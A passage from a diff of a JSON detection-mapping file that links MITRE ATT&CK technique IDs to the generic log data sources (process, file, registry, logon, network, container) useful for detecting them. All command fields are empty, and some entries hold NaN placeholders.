creation", + "description": "An instance was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "ran", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "redeployed", + "target_data_element": "instance" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1610", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container start", + "description": "A container was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "container" + }, + { + "data_source": "pod", + "definition": "Information about a pod within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "pod creation", + "description": "A pod was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "pod" + }, + { + "data_source": "pod", + "definition": "Information about a pod within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "pod modification", + "description": "A pod was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "pod" + }, + { + "data_source": "pod", + "definition": "Information about a pod within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "pod modification", + "description": "A pod was modified.", + "source_data_element": "user", + "relationship": "deployed container in", + "target_data_element": "pod" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://kubernetes.io/docs/reference/kubectl/kubectl/", + "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1608.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1608.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1608.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1608.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1608.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1608", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1016.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1555.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1484.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object creation", + "description": "An active directory object was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object deletion", + "description": "An active directory object was deleted", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1547.014", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1606.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential creation", + "description": "A web credential was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "web credential" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ] + ] + }, + { + "technique_id": "T1606", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential creation", + "description": "A web credential was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "web credential" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ] + ] + }, + { + "technique_id": "T1059.008", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1602.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an 